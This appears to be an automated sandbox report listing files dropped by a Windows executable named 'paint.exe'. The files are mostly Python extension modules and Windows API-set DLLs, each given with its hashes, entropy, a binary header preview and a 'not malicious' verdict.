SSDEEP:	1536:J8WbMZcJfOC2nKdLtBF6lT43WtFSf6gphAVM7uqGKs6t/I+Z1jXyUzR9ufI+vvGG:ewMZUfOKdLjFnQFmf4MxGYI+Z1jzxVVm
MD5:	7A4DAD239486B02FF5106141D7ABA3A7
SHA1:	BD0AF849DAC3322B64B5D44956074FA50961AACA
SHA-256:	10856DBFD8C956E24ED04F6D533B8C03A2131A99F3AE427FACD7BEE9AD98802A
SHA-512:	245B5B86A796660983E3FF0297A930F0D64EA4CECF6E6743D3E4B9999C5990C4ECB1600271FFF4E1F0A46CCEBC74E6AEF522585DF50080A86BB104E7797E64AE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K..............X......3.......3.......3.......3.......3.......4...............3.......3.......34......3......Rich....................PE..d....]Og.........." ...*. ...............................................................`.........................................4...L....................@.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28152
Entropy (8bit):	7.4376874076747
Encrypted:	false
SSDEEP:	768:a7dt2poFpBXI+QUVHJyUFRYT2Ip4ACxf1mlD0D8:wdwpgXI+QUVpyUzR9xfIID8
MD5:	051B0B941192073345D52298F0129B1F
SHA1:	348CB2C18E7ECBEFC45168259ADCCAF5287161B2
SHA-256:	04CA88870ADE6C654490268D93360A61965E8CA799F2D52F6C99948B317BDE4D
SHA-512:	EF78E5D9F5054BBDDC97A3A20471CA13E527739C48664F88108FA61B204E1AD98B0DA205175650C26CDE407775458769A359273AFBDC22060502BC018DE3B260
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^..\..............K......j.......j.......j.......j.......j......hm..........Q....j.......j.......j'......j......Rich....................PE..d....\Og.........." ....0..........0.....................................................`.............................................L.......P............`..............<.......................................0...@...........................................UPX0....................................UPX1.....0.........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	47464
Entropy (8bit):	7.7029514865981605
Encrypted:	false
SSDEEP:	768:VNDTv9rez/QuT6QgD2liUHE559FbH/0pNTUI+LwoB+JyUFRYT2Ip4NTxf1mlTAwQ:Vhv9rerTPgK0UH659FSTUI+LwoByyUzN
MD5:	301875ACE6D58AB5737871A14C163A74
SHA1:	35D41B27E589F8295A00A2ADB209B8911E07CE3C
SHA-256:	B3895E8D9389DC883EF05898D3E3E49BADC6D5E6A9433EA6CA315E2513AD88AF
SHA-512:	8A22CA71A62FC10B4CC0F17672554ED3FEEDC315EA118329034C9CC1D132E06767679D5E6180ADBB22232AD6D4B42A1152473FDDF9A0E50482F45FDC43DC16E7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t..}t..}t..}}.S}r..}ee.\|v..}ee.\|w..}ee.\|\|..}ee.\|y..}.e.\|v..}t..}...}.b.\|}..}.e.\|u..}.e.\|u..}.e?}u..}.e.\|u..}Richt..}........................PE..d....\Og.........." ...*.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61296
Entropy (8bit):	7.834573193988759
Encrypted:	false
SSDEEP:	1536:YdnfbpxydomstdKw0VYtL3tjzyZKI+OQ46yUzR9YfIQskp:Ydf18dhsX0U3ttI+OQ4Mk
MD5:	9BF44FB475F1732DF8C14B323CC5EC58
SHA1:	16B1F1C63D9A59307293E0A8607023DA2616CBD9
SHA-256:	47EB79D84017ED5C4933622166DC0F003A59FF5556998F23385BE4D6C06B165A
SHA-512:	A97A1059930E1DE933B7899A5F115B065F3358376FF85B995FF4158E86C32379ACC01185DFCF076A2337AF3A81AE949F23B029EBC49E31DC24C4B3D8392C9194
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\...=u..=u..=u..E..=u..t..=u....=u..v..=u..q..=u..p..=u...t..=u...t..=u..=t..<u...x..=u...u..=u......=u...w..=u.Rich.=u.........................PE..d....\Og.........." ...*.........p.. ........................................@............`..........................................;..P....9.......0..........D............;...................................... &..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	69488
Entropy (8bit):	7.8539496905928505
Encrypted:	false
SSDEEP:	1536:NW82vuL9jIWDOgata/rVHiyrVI+C7j/1VyUzR9Q3fInSA:NW82vaj+g6DyJI+C7jXt
MD5:	E6B2D8917B8A03E21F0AF257555767A8
SHA1:	A75D24FA95A6CB27A267AE82FA1006E21E85ED77
SHA-256:	2448D2B881511434DC5CFD397369B0F23D43F08446E3BB4772DA3EB6D593EB1F
SHA-512:	94AAB28A1B7AEC86FF4B9E932876519660E2069846EC2EDB6410A4925FBA98CC3F453602E6071741BEABB057A9142C3A68906652C37626B053DEC93596793239
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.^H...H...H...A~!.N...Y...J...Y...K...Y...@...Y...E......J...]...L...H.......:...O......J......I....M.I......I...RichH...........PE..d....\Og.........." ...*.........@.......P...................................0............`.........................................l,..d....)....... ..........D............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22112
Entropy (8bit):	4.744270711412692
Encrypted:	false
SSDEEP:	192:zFOhcWqhWpvWEXCVWQ4iWwklRxwVIX01k9z3AROVaz4ILS:zFlWqhWpk6R9zeU0J2
MD5:	E8B9D74BFD1F6D1CC1D99B24F44DA796
SHA1:	A312CFC6A7ED7BF1B786E5B3FD842A7EEB683452
SHA-256:	B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
SHA-512:	B74D9B12B69DB81A96FC5A001FD88C1E62EE8299BA435E242C5CB2CE446740ED3D8A623E1924C2BC07BFD9AEF7B2577C9EC8264E53E5BE625F4379119BAFCC27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.602255667966723
Encrypted:	false
SSDEEP:	192:NWqhWEWEXCVWQ4cRWvBQrVXC4dlgX01k9z3AUj7W6SxtR:NWqhWPlZVXC4deR9zVj7QR
MD5:	CFE0C1DFDE224EA5FED9BD5FF778A6E0
SHA1:	5150E7EDD1293E29D2E4D6BB68067374B8A07CE6
SHA-256:	0D0F80CBF476AF5B1C9FD3775E086ED0DFDB510CD0CC208EC1CCB04572396E3E
SHA-512:	B0E02E1F19CFA7DE3693D4D63E404BDB9D15527AC85A6D492DB1128BB695BFFD11BEC33D32F317A7615CB9A820CD14F9F8B182469D65AF2430FFCDBAD4BD7000
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.606873381830854
Encrypted:	false
SSDEEP:	192:T0WqhWnWEXCVWQ4mW5ocADB6ZX01k9z3AkprGvV:T0WqhW8VcTR9zJpr4V
MD5:	33BBECE432F8DA57F17BF2E396EBAA58
SHA1:	890DF2DDDFDF3EECCC698312D32407F3E2EC7EB1
SHA-256:	7CF0944901F7F7E0D0B9AD62753FC2FE380461B1CCE8CDC7E9C9867C980E3B0E
SHA-512:	619B684E83546D97FC1D1BC7181AD09C083E880629726EE3AF138A9E4791A6DCF675A8DF65DC20EDBE6465B5F4EAC92A64265DF37E53A5F34F6BE93A5C2A7AE5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@...........`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.65169290018864
Encrypted:	false
SSDEEP:	192:qzmxD3T4qLWqhW2WJWadJCsVWQ4mW/xNVAv+cQ0GX01k9z3ARoanSwT44:qzQVWqhWTCsiNbZR9zQoUSwTJ
MD5:	EB0978A9213E7F6FDD63B2967F02D999
SHA1:	9833F4134F7AC4766991C918AECE900ACFBF969F
SHA-256:	AB25A1FE836FC68BCB199F1FE565C27D26AF0C390A38DA158E0D8815EFE1103E
SHA-512:	6F268148F959693EE213DB7D3DB136B8E3AD1F80267D8CBD7D5429C021ADACCC9C14424C09D527E181B9C9B5EA41765AFF568B9630E4EB83BFC532E56DFE5B63
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26216
Entropy (8bit):	4.866487428274293
Encrypted:	false
SSDEEP:	192:gaNYPvVX8rFTsCWqhWVWEXCVWQ4mWPJlBLrp0KBQfX01k9z3ALkBw:WPvVX8WqhWiyBRxB+R9z2kBw
MD5:	EFAD0EE0136532E8E8402770A64C71F9
SHA1:	CDA3774FE9781400792D8605869F4E6B08153E55
SHA-256:	3D2C55902385381869DB850B526261DDEB4628B83E690A32B67D2E0936B2C6ED
SHA-512:	69D25EDF0F4C8AC5D77CB5815DFB53EAC7F403DC8D11BFE336A545C19A19FFDE1031FA59019507D119E4570DA0D79B95351EAC697F46024B4E558A0FF6349852
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P......z.....`A........................................p................@...............@..h&..............p............................................................................rdata..\|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.619913450163593
Encrypted:	false
SSDEEP:	192:iDGaWqhWhWJWadJCsVWQ4mWd9afKUSIX01k9z3AEXzAU9:i6aWqhWACs92IR9z5EU9
MD5:	1C58526D681EFE507DEB8F1935C75487
SHA1:	0E6D328FAF3563F2AAE029BC5F2272FB7A742672
SHA-256:	EF13DCE8F71173315DFC64AB839B033AB19A968EE15230E9D4D2C9D558EFEEE2
SHA-512:	8EDB9A0022F417648E2ECE9E22C96E2727976332025C3E7D8F15BCF6D7D97E680D1BF008EB28E2E0BD57787DCBB71D38B2DEB995B8EDC35FA6852AB1D593F3D1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@......;.....`A........................................p...L............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18696
Entropy (8bit):	7.054510010549814
Encrypted:	false
SSDEEP:	384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
MD5:	BFFFA7117FD9B1622C66D949BAC3F1D7
SHA1:	402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
SHA-256:	1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
SHA-512:	B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.625331165566263
Encrypted:	false
SSDEEP:	192:qzWqhWxWJWadJCsVWQ4mW8RJLNVAv+cQ0GX01k9z3ARo8ef3uBJu:qzWqhWwCsjNbZR9zQoEzu
MD5:	E89CDCD4D95CDA04E4ABBA8193A5B492
SHA1:	5C0AEE81F32D7F9EC9F0650239EE58880C9B0337
SHA-256:	1A489E0606484BD71A0D9CB37A1DC6CA8437777B3D67BFC8C0075D0CC59E6238
SHA-512:	55D01E68C8C899E99A3C62C2C36D6BCB1A66FF6ECD2636D2D0157409A1F53A84CE5D6F0C703D5ED47F8E9E2D1C9D2D87CC52585EE624A23D92183062C999B97E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.737397647066978
Encrypted:	false
SSDEEP:	192:OdxlZWqhWcWJWadJCsVWQ4mWlhtFyttuX01k9z3A2oD:OdxlZWqhWpCsctkSR9zfoD
MD5:	ACCC640D1B06FB8552FE02F823126FF5
SHA1:	82CCC763D62660BFA8B8A09E566120D469F6AB67
SHA-256:	332BA469AE84AA72EC8CCE2B33781DB1AB81A42ECE5863F7A3CB5A990059594F
SHA-512:	6382302FB7158FC9F2BE790811E5C459C5C441F8CAEE63DF1E09B203B8077A27E023C4C01957B252AC8AC288F8310BCEE5B4DCC1F7FC691458B90CDFAA36DCBE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@.......A....`A........................................p................0...............0..x&..............p............................................................................rdata..\|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.6569647133331316
Encrypted:	false
SSDEEP:	192:dwWqhWWWEXCVWQ4mWLnySfKUSIX01k9z3AEXz5SLaDa3:iWqhWJhY2IR9z5YLt3
MD5:	C6024CC04201312F7688A021D25B056D
SHA1:	48A1D01AE8BC90F889FB5F09C0D2A0602EE4B0FD
SHA-256:	8751D30DF554AF08EF42D2FAA0A71ABCF8C7D17CE9E9FF2EA68A4662603EC500
SHA-512:	D86C773416B332945ACBB95CBE90E16730EF8E16B7F3CCD459D7131485760C2F07E95951AEB47C1CF29DE76AFFEB1C21BDF6D8260845E32205FE8411ED5EFA47
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......v.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.882042129450427
Encrypted:	false
SSDEEP:	192:9TvuBL3BBLAWqhWUWEXCVWQ4iWgdCLVx6RMySX01k9z3AzaXQ+BB:9TvuBL3BaWqhW/WSMR9zqaP
MD5:	1F2A00E72BC8FA2BD887BDB651ED6DE5
SHA1:	04D92E41CE002251CC09C297CF2B38C4263709EA
SHA-256:	9C8A08A7D40B6F697A21054770F1AFA9FFB197F90EF1EEE77C67751DF28B7142
SHA-512:	8CF72DF019F9FC9CD22FF77C37A563652BECEE0708FF5C6F1DA87317F41037909E64DCBDCC43E890C5777E6BCFA4035A27AFC1AEEB0F5DEBA878E3E9AEF7B02A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.355894399765837
Encrypted:	false
SSDEEP:	384:0naOMw3zdp3bwjGzue9/0jCRrndbnWqhW5lFydVXC4deR9zVj7xR:FOMwBprwjGzue9/0jCRrndbtGydVXC4O
MD5:	724223109E49CB01D61D63A8BE926B8F
SHA1:	072A4D01E01DBBAB7281D9BD3ADD76F9A3C8B23B
SHA-256:	4E975F618DF01A492AE433DFF0DD713774D47568E44C377CEEF9E5B34AAD1210
SHA-512:	19B0065B894DC66C30A602C9464F118E7F84D83010E74457D48E93AACA4422812B093B15247B24D5C398B42EF0319108700543D13F156067B169CCFB4D7B6B7C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@......L0....`A........................................p................0...............0..h&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.771309314175772
Encrypted:	false
SSDEEP:	192:L0WqhWTWEXCVWQ4cRWdmjKDUX01k9z3AQyMX/7kn:L0WqhWol1pR9zzDY
MD5:	3C38AAC78B7CE7F94F4916372800E242
SHA1:	C793186BCF8FDB55A1B74568102B4E073F6971D6
SHA-256:	3F81A149BA3862776AF307D5C7FEEF978F258196F0A1BF909DA2D3F440FF954D
SHA-512:	C2746AA4342C6AFFFBD174819440E1BBF4371A7FED29738801C75B49E2F4F94FD6D013E002BAD2AADAFBC477171B8332C8C5579D624684EF1AFBFDE9384B8588
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......K.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.7115212149950185
Encrypted:	false
SSDEEP:	192:bWqhWUxWJWadJCsVWQ4mW5iFyttuX01k9z3A2EC:bWqhWUwCs8SR9zfEC
MD5:	321A3CA50E80795018D55A19BF799197
SHA1:	DF2D3C95FB4CBB298D255D342F204121D9D7EF7F
SHA-256:	5476DB3A4FECF532F96D48F9802C966FDEF98EC8D89978A79540CB4DB352C15F
SHA-512:	3EC20E1AC39A98CB5F726D8390C2EE3CD4CD0BF118FDDA7271F7604A4946D78778713B675D19DD3E1EC1D6D4D097ABE9CD6D0F76B3A7DFF53CE8D6DBC146870A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.893761152454321
Encrypted:	false
SSDEEP:	192:dEFP2WqhWVWEXCVWQ4mW68vx6RMySX01k9z3AzapOP:eF+WqhWi6gMR9zqa0
MD5:	0462E22F779295446CD0B63E61142CA5
SHA1:	616A325CD5B0971821571B880907CE1B181126AE
SHA-256:	0B6B598EC28A9E3D646F2BB37E1A57A3DDA069A55FBA86333727719585B1886E
SHA-512:	07B34DCA6B3078F7D1E8EDE5C639F697C71210DCF9F05212FD16EB181AB4AC62286BC4A7CE0D84832C17F5916D0224D1E8AAB210CEEFF811FC6724C8845A74FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@............`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	5.231196901820079
Encrypted:	false
SSDEEP:	192:/Mck1JzX9cKSI0WqhWsWJWadJCsVWQ4mWClLeyttuX01k9z3A2XCJq:Uck1JzNcKSI0WqhWZCsvfSR9zfyk
MD5:	C3632083B312C184CBDD96551FED5519
SHA1:	A93E8E0AF42A144009727D2DECB337F963A9312E
SHA-256:	BE8D78978D81555554786E08CE474F6AF1DE96FCB7FA2F1CE4052BC80C6B2125
SHA-512:	8807C2444A044A3C02EF98CF56013285F07C4A1F7014200A21E20FCB995178BA835C30AC3889311E66BC61641D6226B1FF96331B019C83B6FCC7C87870CCE8C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......9&....`A........................................p................0...............0..x&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.799245167892134
Encrypted:	false
SSDEEP:	192:R0DfIeUWqhWLWJWadJCsVWQ4mWFVyttuX01k9z3A2YHmp:R0DfIeUWqhWiCsLSR9zfYHmp
MD5:	517EB9E2CB671AE49F99173D7F7CE43F
SHA1:	4CCF38FED56166DDBF0B7EFB4F5314C1F7D3B7AB
SHA-256:	57CC66BF0909C430364D35D92B64EB8B6A15DC201765403725FE323F39E8AC54
SHA-512:	492BE2445B10F6BFE6C561C1FC6F5D1AF6D1365B7449BC57A8F073B44AE49C88E66841F5C258B041547FCD33CBDCB4EB9DD3E24F0924DB32720E51651E9286BE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@.......,....`A........................................p................0...............0..x&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.587063911311469
Encrypted:	false
SSDEEP:	192:fWqhWeWJWadJCsVWQ4mWMs7DENNVAv+cQ0GX01k9z3ARoIGA/:fWqhWbCs8oNbZR9zQoxS
MD5:	F3FF2D544F5CD9E66BFB8D170B661673
SHA1:	9E18107CFCD89F1BBB7FDAF65234C1DC8E614ADD
SHA-256:	E1C5D8984A674925FA4AFBFE58228BE5323FE5123ABCD17EC4160295875A625F
SHA-512:	184B09C77D079127580EF80EB34BDED0F5E874CEFBE1C5F851D86861E38967B995D859E8491FCC87508930DC06C6BBF02B649B3B489A1B138C51A7D4B4E7AAAD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
